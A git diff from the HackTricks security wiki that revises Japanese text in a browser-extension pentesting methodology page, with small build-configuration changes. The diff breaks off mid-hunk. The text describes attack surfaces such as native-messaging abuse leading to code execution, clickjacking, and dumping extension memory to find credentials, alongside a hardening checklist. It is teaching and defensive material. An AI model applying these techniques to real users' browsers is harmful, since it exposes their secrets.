diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
index f856a1769..ef58dfa84 100644
--- a/.github/pull_request_template.md
+++ b/.github/pull_request_template.md
@@ -1,4 +1,4 @@
 ## 帰属
-私たちはあなたの知識を重視し、コンテンツの共有を奨励します。アップロードするコンテンツは、あなた自身のものであるか、元の著者から共有の許可を得ていることを確認してください（追加したテキスト内または修正しているページの最後に著者への参照を追加するか、またはその両方）。知的財産権へのあなたの尊重は、誰にとっても信頼できる合法的な共有環境を育みます。
+私たちはあなたの知識を重視し、コンテンツの共有を奨励します。必ず、自分が所有しているコンテンツまたは元の著者から共有の許可を得ているコンテンツのみをアップロードしてください（追加したテキスト内または修正しているページの最後に著者への参照を追加すること）。知的財産権へのあなたの尊重は、誰にとっても信頼できる合法的な共有環境を育みます。
 
 HackTricksへの貢献ありがとうございます！
diff --git a/book.toml b/book.toml
index 55f8eeb4f..3d588387c 100644
--- a/book.toml
+++ b/book.toml
@@ -22,6 +22,7 @@ after = ["links"]
 
 [preprocessor.hacktricks]
 command = "python3 ./hacktricks-preprocessor.py"
+env = "prod"
 
 [output.html]
 additional-css = ["theme/pagetoc.css", "theme/tabs.css"]
diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py
index 37f549101..fedfdef99 100644
--- a/hacktricks-preprocessor.py
+++ b/hacktricks-preprocessor.py
@@ -30,14 +30,16 @@ def ref(matchobj):
     href =  matchobj.groups(0)[0].strip()
     title = href
     if href.startswith("http://") or href.startswith("https://"):
-        # pass
-        try:
-            raw_html = str(urlopen(Request(href, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'})).read())
-            match = re.search('<title>(.*?)</title>', raw_html)
-            title = match.group(1) if match else href
-        except Exception as e:
-            logger.debug(f'Error opening URL {href}: {e}')
-            pass #nDont stop on broken link
+        if context['config']['preprocessor']['hacktricks']['env'] == 'dev':
+            pass
+        else:
+            try:
+                raw_html = str(urlopen(Request(href, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'})).read())
+                match = re.search('<title>(.*?)</title>', raw_html)
+                title = match.group(1) if match else href
+            except Exception as e:
+                logger.debug(f'Error opening URL {href}: {e}')
+                pass #nDont stop on broken link
     else:
         try:
             if href.endswith("/"):
@@ -90,7 +92,7 @@ if __name__ == '__main__':
     context, book = json.load(sys.stdin)
 
     logger.debug(f"Context: {context}")
-
+    logger.debug(f"Env: {context['config']['preprocessor']['hacktricks']['env']}")
 
     for chapter in iterate_chapters(book['sections']):
         logger.debug(f"Chapter: {chapter['path']}")
diff --git a/src/1911-pentesting-fox.md b/src/1911-pentesting-fox.md
index 5f4d7a01c..357aabb69 100644
--- a/src/1911-pentesting-fox.md
+++ b/src/1911-pentesting-fox.md
@@ -12,7 +12,7 @@ dht udp "DHT Nodes"
 
 ![](<images/image (273).png>)
 
-![](<images/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
+![](<images/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
 
 InfluxDB
 
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/README.md b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
index ef14f2617..6968e5277 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/README.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
@@ -8,7 +8,7 @@
 
 ## 主なコンポーネント
 
-拡張機能のレイアウトは視覚化すると最も良く見え、3つのコンポーネントで構成されています。それぞれのコンポーネントを詳しく見ていきましょう。
+拡張機能のレイアウトは視覚化されると最も良く見え、3つのコンポーネントで構成されています。それぞれのコンポーネントを詳しく見ていきましょう。
 
 <figure><img src="../../images/image (16) (1) (1).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure>
 
@@ -18,7 +18,7 @@
 
 ### **拡張機能コア**
 
-拡張機能コアは、ほとんどの拡張機能の特権/アクセスを含んでいますが、拡張機能コアは[XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest)とコンテンツスクリプトを介してのみウェブコンテンツと相互作用できます。また、拡張機能コアはホストマシンに直接アクセスすることはできません。
+拡張機能コアは、ほとんどの拡張機能の特権/アクセスを含んでいますが、拡張機能コアは[XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest)およびコンテンツスクリプトを介してのみウェブコンテンツと相互作用できます。また、拡張機能コアはホストマシンに直接アクセスすることはできません。
 
 ### **ネイティブバイナリ**
 
@@ -31,7 +31,7 @@
 
 拡張機能の各コンポーネントは、**強力な保護境界**によって互いに分離されています。各コンポーネントは**別々のオペレーティングシステムプロセス**で実行されます。コンテンツスクリプトと拡張機能コアは、ほとんどのオペレーティングシステムサービスに利用できない**サンドボックスプロセス**で実行されます。
 
-さらに、コンテンツスクリプトは**別のJavaScriptヒープ**で実行されることによって、関連するウェブページから分離されています。コンテンツスクリプトとウェブページは**同じ基盤となるDOM**にアクセスできますが、2つは**JavaScriptポインタを交換することは決してありません**。これにより、JavaScript機能の漏洩が防止されます。
+さらに、コンテンツスクリプトは**別のJavaScriptヒープ**で実行されることによって、関連するウェブページから分離されています。コンテンツスクリプトとウェブページは**同じ基盤となるDOM**にアクセスできますが、2つは**JavaScriptポインタを交換することは決してありません**。これにより、JavaScript機能の漏洩を防ぎます。
 
 ## **`manifest.json`**
 
@@ -91,7 +91,7 @@ document.body.appendChild(div)
 ```
 <figure><img src="../../images/image (23).png" alt=""><figcaption></figcaption></figure>
 
-このボタンがクリックされると、コンテンツスクリプトによって拡張ページにメッセージが送信されます。これは、[**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage)を利用するためです。コンテンツスクリプトはAPIへの直接アクセスに制限があり、`storage`が数少ない例外の一つです。これらの例外を超える機能については、メッセージが拡張ページに送信され、コンテンツスクリプトが通信できるようになります。
+このボタンがクリックされると、コンテンツスクリプトによって拡張ページにメッセージが送信されます。これは、[**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage)を利用するためです。これは、コンテンツスクリプトがAPIに直接アクセスする制限があるためで、`storage`が数少ない例外の一つです。これらの例外を超える機能については、メッセージが拡張ページに送信され、コンテンツスクリプトが通信できるようになります。
 
 > [!WARNING]
 > ブラウザによって、コンテンツスクリプトの機能は若干異なる場合があります。Chromiumベースのブラウザの場合、機能リストは[Chrome Developers documentation](https://developer.chrome.com/docs/extensions/mv3/content_scripts/#capabilities)で入手可能で、Firefoxの場合は[MDN](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_scripts#webextension_apis)が主な情報源となります。\
@@ -104,9 +104,9 @@ Chromeでコンテンツスクリプトを表示およびデバッグするに
 ### 注入されたコンテンツスクリプト
 
 > [!TIP]
-> **コンテンツスクリプトは必須ではない**ことに注意してください。**動的に**スクリプトを**注入**したり、**プログラム的に注入**することも可能です。これは実際により**詳細な制御**を提供します。
+> **コンテンツスクリプトは必須ではない**ことに注意してください。**動的に**スクリプトを**注入**したり、**プログラム的に注入**することも可能です。これは、**`tabs.executeScript`**を介してウェブページに行います。これにより、より**詳細な制御**が提供されます。
 
-コンテンツスクリプトをプログラム的に注入するには、拡張機能がスクリプトを注入するページに対して[ホスト権限](https://developer.chrome.com/docs/extensions/reference/permissions)を持っている必要があります。これらの権限は、拡張機能のマニフェスト内で**要求する**か、[**activeTab**](https://developer.chrome.com/docs/extensions/reference/manifest/activeTab)を通じて一時的に取得することができます。
+コンテンツスクリプトをプログラム的に注入するには、拡張機能がスクリプトを注入するページに対して[ホスト権限](https://developer.chrome.com/docs/extensions/reference/permissions)を持っている必要があります。これらの権限は、拡張機能のマニフェスト内で**要求する**か、[**activeTab**](https://developer.chrome.com/docs/extensions/reference/manifest/activeTab)を介して一時的に取得することができます。
 
 #### activeTabベースの拡張機能の例
 ```json:manifest.json
@@ -210,14 +210,14 @@ js: ["contentScript.js"],
 
 コンテンツスクリプトによって送信されたメッセージは、**background page**によって受信され、拡張機能のコンポーネントを調整する中心的な役割を果たします。特に、background pageは拡張機能のライフタイムを通じて持続し、ユーザーの直接的な操作なしに静かに動作します。独自のDocument Object Model (DOM)を持ち、複雑な相互作用と状態管理を可能にします。
 
-**主なポイント**:
+**重要なポイント**:
 
 - **Background Pageの役割:** 拡張機能の神経中枢として機能し、拡張機能のさまざまな部分間の通信と調整を確保します。
 - **持続性:** ユーザーには見えないが、拡張機能の機能に不可欠な常に存在するエンティティです。
 - **自動生成:** 明示的に定義されていない場合、ブラウザは自動的にbackground pageを作成します。この自動生成されたページには、拡張機能のマニフェストに指定されたすべてのバックグラウンドスクリプトが含まれ、拡張機能のバックグラウンドタスクのシームレスな操作を確保します。
 
 > [!TIP]
-> 明示的に宣言されていない場合にブラウザがbackground pageを自動生成することによって提供される便利さは、すべての必要なバックグラウンドスクリプトが統合され、機能することを保証し、拡張機能のセットアッププロセスを簡素化します。
+> 明示的に宣言されていない場合にブラウザが自動的にbackground pageを生成することによって提供される便利さは、すべての必要なバックグラウンドスクリプトが統合され、機能することを保証し、拡張機能のセットアッププロセスを簡素化します。
 
 Example background script:
 ```js
@@ -239,18 +239,18 @@ chrome.tabs.create({ url: "https://example.net/explanation" })
 
 - **アクションページ**は、**拡張機能のアイコン**がクリックされたときにドロップダウンで表示されます。
 - 拡張機能が**新しいタブで読み込む**ページ。
-- **オプションページ**：このページはクリックすると拡張機能の上に表示されます。前のマニフェストでは、`chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca`でこのページにアクセスできました。または、クリックして：
+- **オプションページ**：このページはクリックすると拡張機能の上に表示されます。前のマニフェストでは、`chrome://extensions/?options=fadlhnelkbeojnebcbkacjilhnbjfjca`でこのページにアクセスできました。または、クリックすることで：
 
 <figure><img src="../../images/image (24).png" alt="" width="375"><figcaption></figcaption></figure>
 
 これらのページは、必要に応じて動的にコンテンツを読み込むため、バックグラウンドページのように永続的ではないことに注意してください。それにもかかわらず、これらはバックグラウンドページと特定の機能を共有します：
 
 - **コンテンツスクリプトとの通信**：バックグラウンドページと同様に、これらのページはコンテンツスクリプトからメッセージを受信でき、拡張機能内での相互作用を促進します。
-- **拡張機能固有のAPIへのアクセス**：これらのページは、拡張機能に対して定義された権限に従って、拡張機能固有のAPIへの包括的なアクセスを享受します。
+- **拡張機能固有のAPIへのアクセス**：これらのページは、拡張機能に定義された権限に従って、拡張機能固有のAPIへの包括的なアクセスを享受します。
 
 ### `permissions` & `host_permissions`
 
-**`permissions`**と**`host_permissions`**は、`manifest.json`のエントリで、**ブラウザ拡張機能がどの権限**（ストレージ、位置情報など）を持っているか、**どのウェブページ**であるかを示します。
+**`permissions`**と**`host_permissions`**は、拡張機能が持つ**どの権限**（ストレージ、位置情報など）と**どのウェブページ**であるかを示す`manifest.json`のエントリです。
 
 ブラウザ拡張機能は非常に**特権的**であるため、悪意のあるものや侵害されたものは、攻撃者に**機密情報を盗んだりユーザーを監視したりするためのさまざまな手段を提供する可能性があります**。
 
@@ -305,7 +305,7 @@ chrome-extension://<extension-id>/message.html
 ただし、`manifest.json`パラメータ**`use_dynamic_url`**が使用されている場合、この**idは動的**になる可能性があります。
 
 > [!TIP]
-> ここにページが記載されていても、**Content Security Policy**のおかげで**ClickJacking**から**保護されている**可能性があることに注意してください。したがって、ClickJacking攻撃が可能かどうかを確認する前に、それをチェックする必要があります（frame-ancestorsセクション）。
+> ここにページが記載されていても、**Content Security Policy**のおかげで**ClickJacking**から**保護されている**可能性があることに注意してください。したがって、ClickJacking攻撃が可能かどうかを確認する前に、これをチェックする必要があります（frame-ancestorsセクション）。
 
 これらのページにアクセスできることは、これらのページが**潜在的に脆弱なClickJacking**であることを意味します：
 
@@ -314,7 +314,7 @@ browext-clickjacking.md
 {{#endref}}
 
 > [!TIP]
-> これらのページが拡張機能によってのみ読み込まれ、ランダムなURLによっては読み込まれないようにすることで、ClickJacking攻撃を防ぐことができます。
+> これらのページが拡張機能によってのみ読み込まれ、ランダムなURLからは読み込まれないようにすることで、ClickJacking攻撃を防ぐことができます。
 
 > [!CAUTION]
 > **`web_accessible_resources`**からのページや拡張機能の他のページも**バックグラウンドスクリプトに連絡する**ことができることに注意してください。したがって、これらのページのいずれかが**XSS**に対して脆弱である場合、より大きな脆弱性を引き起こす可能性があります。
@@ -391,9 +391,9 @@ console.log("Content script received message from background script:", msg)
 
 特定のタブにあるコンテンツスクリプトにメッセージを送信することも可能で、**`chrome.tabs.sendMessage`**を呼び出す際にメッセージを送信する**タブのID**を指定する必要があります。
 
-### 許可された `externally_connectable` から拡張機能へ
+### 許可された`externally_connectable`から拡張機能へ
 
-`externally_connectable` 設定で許可された**Webアプリと外部ブラウザ拡張機能**は、リクエストを送信できます：
+`externally_connectable`設定で許可された**Webアプリと外部ブラウザ拡張機能**は、リクエストを送信できます：
 ```javascript
 chrome.runtime.sendMessage(extensionId, ...
 ```
@@ -413,7 +413,7 @@ console.log("Received " + response)
 ```
 ## Web **↔︎** コンテンツスクリプト通信
 
-**コンテンツスクリプト**が動作する環境とホストページが存在する環境は**分離**されており、**隔離**が確保されています。この隔離にもかかわらず、両者はページの**ドキュメントオブジェクトモデル (DOM)**にアクセスできる能力を持ち、これは共有リソースです。ホストページが**コンテンツスクリプト**と通信するため、またはコンテンツスクリプトを介して拡張機能と間接的に通信するためには、両者がアクセス可能な**DOM**を通信チャネルとして利用する必要があります。
+**コンテンツスクリプト**が動作する環境とホストページが存在する環境は**分離**されており、**隔離**が確保されています。この隔離にもかかわらず、両者はページの**ドキュメントオブジェクトモデル (DOM)**、つまり共有リソースと相互作用する能力を持っています。ホストページが**コンテンツスクリプト**と通信する、またはコンテンツスクリプトを介して拡張機能と間接的に通信するためには、両者がアクセス可能な**DOM**を通信チャネルとして利用する必要があります。
 
 ### ポストメッセージ
 ```javascript:content-script.js
@@ -452,11 +452,11 @@ false
 ```
 安全なPost Message通信は、受信したメッセージの信頼性を確認する必要があります。これは以下を確認することで行えます：
 
-- **`event.isTrusted`**: これは、イベントがユーザーのアクションによってトリガーされた場合にのみTrueになります。
+- **`event.isTrusted`**: これは、イベントがユーザーのアクションによってトリガーされた場合のみTrueになります。
 - コンテンツスクリプトは、ユーザーが何らかのアクションを実行した場合にのみメッセージを期待するかもしれません。
-- **origin domain**: メッセージを期待する場合は、許可リストのドメインのみを許可する必要があります。
-- 正規表現を使用する場合は、非常に注意が必要です。
-- **Source**: `received_message.source !== window`を使用して、メッセージが**コンテンツスクリプトがリスニングしている同じウィンドウ**からのものであるかどうかを確認できます。
+- **origin domain**: メッセージを期待する場合は、許可リストのドメインのみを許可するかもしれません。
+- 正規表現が使用される場合は、非常に注意が必要です。
+- **Source**: `received_message.source !== window`を使用して、メッセージが**コンテンツスクリプトがリスニングしている同じウィンドウから**のものであるかを確認できます。
 
 前述のチェックは、実施されていても脆弱である可能性があるため、次のページで**潜在的なPost Messageバイパス**を確認してください：
 
@@ -466,7 +466,7 @@ false
 
 ### Iframe
 
-別の通信方法として**Iframe URLs**を通じて行うことが考えられます。例は以下にあります：
+別の通信方法としては、**Iframe URLs**を通じて行うことが考えられます。例は以下にあります：
 
 {{#ref}}
 browext-xss-example.md
@@ -509,7 +509,7 @@ const response = await chrome.tabs.sendMessage(tab.id, { greeting: "hello" })
 console.log(response)
 })()
 ```
-**受信側**では、メッセージを処理するために[**runtime.onMessage**](https://developer.chrome.com/docs/extensions/reference/runtime#event-onMessage) **イベントリスナー**を設定する必要があります。これは、コンテンツスクリプトまたは拡張ページから見ると同じように見えます。
+受信側では、メッセージを処理するために[**runtime.onMessage**](https://developer.chrome.com/docs/extensions/reference/runtime#event-onMessage) **イベントリスナー**を設定する必要があります。これは、コンテンツスクリプトまたは拡張ページから見ると同じように見えます。
 ```javascript
 // From https://stackoverflow.com/questions/70406787/javascript-send-message-from-content-js-to-background-js
 chrome.runtime.onMessage.addListener(function (request, sender, sendResponse) {
@@ -529,7 +529,7 @@ if (request.greeting === "hello") sendResponse({ farewell: "goodbye" })
 
 ## ネイティブメッセージング
 
-ブラウザ拡張機能は、**システム内のバイナリと stdin 経由で通信することも可能です**。アプリケーションは、次のような json でそれを示す json をインストールする必要があります:
+ブラウザ拡張機能は、**stdinを介してシステム内のバイナリと通信することも可能です**。アプリケーションは、これを示すjsonをインストールする必要があります。
 ```json
 {
 "name": "com.my_company.my_application",
@@ -539,12 +539,12 @@ if (request.greeting === "hello") sendResponse({ farewell: "goodbye" })
 "allowed_origins": ["chrome-extension://knldjmfmopnpolahpmmgbagdohdnhkik/"]
 }
 ```
-`name` は [`runtime.connectNative()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-connectNative) または [`runtime.sendNativeMessage()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-sendNativeMessage) に渡される文字列で、ブラウザ拡張のバックグラウンドスクリプトからアプリケーションと通信するために使用されます。`path` はバイナリへのパスで、1つの有効な `type` は stdio（stdin と stdout を使用）であり、`allowed_origins` はアクセスできる拡張機能を示します（ワイルドカードは使用できません）。
+`name` は [`runtime.connectNative()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-connectNative) または [`runtime.sendNativeMessage()`](https://developer.chrome.com/docs/extensions/reference/api/runtime#method-sendNativeMessage) に渡される文字列で、ブラウザ拡張のバックグラウンドスクリプトからアプリケーションと通信するために使用されます。 `path` はバイナリへのパスで、1つの有効な `type` は stdio（stdin と stdout を使用）であり、 `allowed_origins` はアクセスできる拡張機能を示します（ワイルドカードは使用できません）。
 
 Chrome/Chromium は、この JSON をいくつかの Windows レジストリや macOS および Linux のいくつかのパスで検索します（詳細は [**docs**](https://developer.chrome.com/docs/extensions/develop/concepts/native-messaging) を参照）。
 
 > [!TIP]
-> ブラウザ拡張は、この通信を使用するために `nativeMessaing` 権限を宣言する必要があります。
+> ブラウザ拡張は、この通信を使用できるようにするために `nativeMessaing` 権限を宣言する必要があります。
 
 これは、ネイティブアプリケーションにメッセージを送信するバックグラウンドスクリプトコードの例です：
 ```javascript
@@ -558,7 +558,7 @@ console.log("Received " + response)
 ```
 [**このブログ記事**](https://spaceraccoon.dev/universal-code-execution-browser-extensions/)では、ネイティブメッセージを悪用する脆弱なパターンが提案されています：
 
-1. ブラウザ拡張機能には、コンテンツスクリプトのためのワイルドカードパターンがあります。
+1. ブラウザ拡張機能は、コンテンツスクリプトのためのワイルドカードパターンを持っています。
 2. コンテンツスクリプトは、`sendMessage`を使用してバックグラウンドスクリプトに`postMessage`メッセージを渡します。
 3. バックグラウンドスクリプトは、`sendNativeMessage`を使用してネイティブアプリケーションにメッセージを渡します。
 4. ネイティブアプリケーションはメッセージを危険に扱い、コード実行につながります。
@@ -569,21 +569,21 @@ console.log("Received " + response)
 
 ブラウザ拡張機能が**メモリ内に機密情報を保存している場合**、これは**ダンプ**される可能性があり（特にWindowsマシンで）、この情報が**検索**される可能性があります。
 
-したがって、ブラウザ拡張機能のメモリは**安全とは見なされるべきではなく**、**機密情報**（資格情報やニーモニックフレーズなど）は**保存されるべきではありません**。
+したがって、ブラウザ拡張機能のメモリは**安全とは見なされるべきではなく**、資格情報やニーモニックフレーズなどの**機密情報は保存されるべきではありません**。
 
-もちろん、**コード内に機密情報を置かないでください**。それは**公開**されることになります。
+もちろん、**コード内に機密情報を置かないでください**、それは**公開される**からです。
 
-ブラウザからメモリをダンプするには、**プロセスメモリをダンプ**するか、ブラウザ拡張機能の**設定**に行き、**`ポップアップを検査`**をクリック -> **`メモリ`**セクション -> **`スナップショットを取得`**し、**`CTRL+F`**でスナップショット内の機密情報を検索します。
+ブラウザからメモリをダンプするには、**プロセスメモリをダンプ**するか、ブラウザ拡張機能の**設定**に行き、**`Inspect pop-up`**をクリック -> **`Memory`**セクション -> **`Take a snapshot`**を選択し、**`CTRL+F`**でスナップショット内の機密情報を検索します。
 
-さらに、ニーモニックキーやパスワードのような非常に機密性の高い情報は、**クリップボードにコピーされることを許可すべきではありません**（または少なくとも数秒以内にクリップボードから削除するべきです）。そうしないと、クリップボードを監視しているプロセスがそれらを取得できるようになります。
+さらに、ニーモニックキーやパスワードのような非常に機密性の高い情報は、**クリップボードにコピーされることを許可すべきではありません**（または少なくとも数秒以内にクリップボードから削除するべきです）なぜなら、クリップボードを監視しているプロセスがそれらを取得できるからです。
 
 ## ブラウザに拡張機能を読み込む
 
 1. **ブラウザ拡張機能をダウンロード**し、解凍します。
-2. **`chrome://extensions/`**に移動し、`開発者モード`を**有効**にします。
-3. **`未パッケージ化の読み込み`**ボタンをクリックします。
+2. **`chrome://extensions/`**に移動し、`Developer Mode`を**有効にします**。
+3. **`Load unpacked`**ボタンをクリックします。
 
-**Firefox**では、**`about:debugging#/runtime/this-firefox`**に移動し、**`一時的なアドオンを読み込む`**ボタンをクリックします。
+**Firefox**では、**`about:debugging#/runtime/this-firefox`**に移動し、**`Load Temporary Add-on`**ボタンをクリックします。
 
 ## ストアからソースコードを取得する
 
@@ -618,7 +618,7 @@ unzip -d "$extension_id-source" "$extension_id.zip"
 
 拡張機能を特定するには、IDを名前にマッピングできます：
 
-- `about:extensions`ページで開発者モードを有効にして、各拡張機能のIDを確認します。
+- `about:extensions`ページで開発者モードを有効にすると、各拡張機能のIDが表示されます。
 - 各拡張機能のフォルダ内の`manifest.json`ファイルには、拡張機能を特定するのに役立つ読みやすい`name`フィールドがあります。
 
 ### ファイルアーカイバまたはアンパッカーを使用する
@@ -640,18 +640,18 @@ node query.js -f "metadata.user_count > 250000" "manifest.content_scripts?.lengt
 
 ブラウザ拡張機能は**限られた攻撃面**を持っていますが、その中には**脆弱性**や**強化の可能性**が含まれている場合があります。以下は最も一般的なものです：
 
-- [ ] **要求される** **`permissions`** を可能な限り**制限**する
-- [ ] **`host_permissions`** を可能な限り**制限**する
+- [ ] **要求される** **`permissions`** を可能な限り制限する
+- [ ] **`host_permissions`** を可能な限り制限する
 - [ ] **強力な** **`content_security_policy`** を使用する
-- [ ] **`externally_connectable`** を可能な限り**制限**する。必要がない場合はデフォルトで残さず、**`{}`** を指定する
-- [ ] **XSSまたは乗っ取りに脆弱なURL**がここに記載されている場合、攻撃者は**バックグラウンドスクリプトに直接メッセージを送信**できる。非常に強力なバイパス。
-- [ ] **`web_accessible_resources`** を可能な限り**制限**する。可能であれば空にする。
-- [ ] **`web_accessible_resources`** がない場合、[**ClickJacking**](browext-clickjacking.md)を確認する
-- [ ] **拡張機能**から**ウェブページ**への**通信**が発生する場合、[**XSS**](browext-xss-example.md) **脆弱性**が通信によって引き起こされていないか確認する。
+- [ ] **`externally_connectable`** を可能な限り制限する。必要がない場合はデフォルトで残さず、**`{}`** を指定する
+- [ ] **XSSまたは乗っ取りに脆弱なURL**がここに記載されている場合、攻撃者は**バックグラウンドスクリプトに直接メッセージを送信できる**。非常に強力なバイパスです。
+- [ ] **`web_accessible_resources`** を可能な限り制限する。可能であれば空にする。
+- [ ] **`web_accessible_resources`** がない場合、[**ClickJacking**](browext-clickjacking.md) を確認する
+- [ ] **拡張機能**から**ウェブページ**への**通信**が発生する場合、通信によって引き起こされる[**XSS**](browext-xss-example.md) **脆弱性**を確認する。
 - [ ] Post Messagesが使用されている場合、[**Post Messageの脆弱性**](../postmessage-vulnerabilities/)**を確認する。**
-- [ ] **Content ScriptがDOMの詳細にアクセス**する場合、ウェブによって**変更**されると**XSSを導入していないか**確認する
+- [ ] **Content ScriptがDOMの詳細にアクセスする**場合、ウェブによって**変更される**と**XSSを導入しない**ことを確認する
 - [ ] この通信が**Content Script -> バックグラウンドスクリプト通信**にも関与している場合は特に強調する
-- [ ] バックグラウンドスクリプトが**ネイティブメッセージング**を介して通信している場合、通信が安全でサニタイズされているか確認する
+- [ ] バックグラウンドスクリプトが**ネイティブメッセージング**を介して通信している場合、通信が安全でサニタイズされていることを確認する
 - [ ] **機密情報は**ブラウザ拡張機能の**コード内に保存すべきではない**
 - [ ] **機密情報は**ブラウザ拡張機能の**メモリ内に保存すべきではない**
 - [ ] **機密情報は****ファイルシステムに無防備に保存すべきではない**
@@ -668,10 +668,10 @@ node query.js -f "metadata.user_count > 250000" "manifest.content_scripts?.lengt
 - [**manifest.json**](https://developer.chrome.com/extensions/manifest) **ビューワー**：拡張機能のマニフェストのJSON整形バージョンを表示します。
 - **フィンガープリンター分析**： [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) の検出とChrome拡張機能フィンガープリンティングJavaScriptの自動生成。
 - **潜在的なClickjacking分析**： [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) ディレクティブが設定された拡張機能のHTMLページの検出。これらはページの目的に応じてClickjackingに脆弱である可能性があります。
-- **権限警告ビューワー**：ユーザーが拡張機能をインストールしようとしたときに表示されるChromeの権限プロンプト警告のリストを表示します。
+- **権限警告ビューワー**：ユーザーが拡張機能をインストールしようとしたときに表示されるすべてのChrome権限プロンプト警告のリストを表示します。
 - **危険な関数**：攻撃者によって悪用される可能性のある危険な関数の場所を示します（例：innerHTML、chrome.tabs.executeScriptなど）。
-- **エントリポイント**：拡張機能がユーザー/外部入力を受け取る場所を示します。これは拡張機能の表面積を理解し、悪意のあるデータを拡張機能に送信する潜在的なポイントを探すのに役立ちます。
-- 危険な関数とエントリポイントのスキャナーは、生成されたアラートに対して以下を持っています：
+- **エントリポイント**：拡張機能がユーザー/外部入力を受け取る場所を示します。これは、拡張機能の表面積を理解し、悪意のあるデータを拡張機能に送信する潜在的なポイントを探すのに役立ちます。
+- 危険な関数とエントリポイントスキャナーは、生成されたアラートに対して以下を持っています：
 - アラートを引き起こした関連コードスニペットと行。
 - 問題の説明。
 - コードを含む完全なソースファイルを表示するための「ファイルを表示」ボタン。
@@ -681,15 +681,15 @@ node query.js -f "metadata.user_count > 250000" "manifest.content_scripts?.lengt
 - 脆弱な行がJavaScriptファイルにある場合、それが含まれているすべてのページのパスとこれらのページのタイプ、[web_accessible_resource](https://developer.chrome.com/extensions/manifest/web_accessible_resources) ステータス。
 - **コンテンツセキュリティポリシー（CSP）アナライザーおよびバイパスチェッカー**：これにより、拡張機能のCSPの弱点が指摘され、ホワイトリストに登録されたCDNなどによるCSPのバイパスの潜在的な方法が明らかになります。
 - **既知の脆弱なライブラリ**：これは[Retire.js](https://retirejs.github.io/retire.js/)を使用して、既知の脆弱なJavaScriptライブラリの使用をチェックします。
-- 拡張機能とフォーマットされたバージョンをダウンロード。
-- 元の拡張機能をダウンロード。
-- 拡張機能の美化されたバージョンをダウンロード（自動整形されたHTMLとJavaScript）。
+- 拡張機能とフォーマットされたバージョンをダウンロードします。
+- 元の拡張機能をダウンロードします。
+- 拡張機能の美化されたバージョンをダウンロードします（自動整形されたHTMLとJavaScript）。
 - スキャン結果の自動キャッシュ。拡張機能のスキャンを初めて実行する際にはかなりの時間がかかります。しかし、拡張機能が更新されていない限り、2回目は結果がキャッシュされるため、ほぼ瞬時に完了します。
-- リンク可能なレポートURL。誰かにtarnishによって生成された拡張機能レポートへのリンクを簡単に提供できます。
+- リンク可能なレポートURL。誰かにTarnishによって生成された拡張機能レポートへのリンクを簡単に提供します。
 
 ### [Neto](https://github.com/elevenpaths/neto)
 
-プロジェクトNetoは、FirefoxやChromeなどの有名なブラウザのブラウザプラグインや拡張機能の隠れた機能を分析し、解明するために考案されたPython 3パッケージです。`manifest.json`、ローカリゼーションフォルダー、またはJavaScriptおよびHTMLソースファイルなどの関連リソースからこれらの機能を抽出するために、パッケージ化されたファイルを解凍するプロセスを自動化します。
+プロジェクトNetoは、FirefoxやChromeなどの有名なブラウザのブラウザプラグインや拡張機能の隠れた機能を分析し、解明するために考案されたPython 3パッケージです。`manifest.json`、ローカリゼーションフォルダー、またはJavaScriptおよびHTMLソースファイルなどの関連リソースからこれらの機能を抽出するために、パッケージ化されたファイルの解凍プロセスを自動化します。
 
 ## 参考文献
 
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
index 99c6b51d3..6d6e1e92a 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
@@ -13,7 +13,7 @@ ClickJackingが何か分からない場合は、以下を確認してくださ
 
 拡張機能には**`manifest.json`**ファイルが含まれており、そのJSONファイルには`web_accessible_resources`フィールドがあります。以下は[Chromeのドキュメント](https://developer.chrome.com/extensions/manifest/web_accessible_resources)に記載されている内容です：
 
-> これらのリソースは、URL **`chrome-extension://[PACKAGE ID]/[PATH]`**を介してウェブページで利用可能になり、これは**`extension.getURL method`**を使用して生成できます。許可されたリソースは適切なCORSヘッダーで提供されるため、XHRなどのメカニズムを介して利用可能です。[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
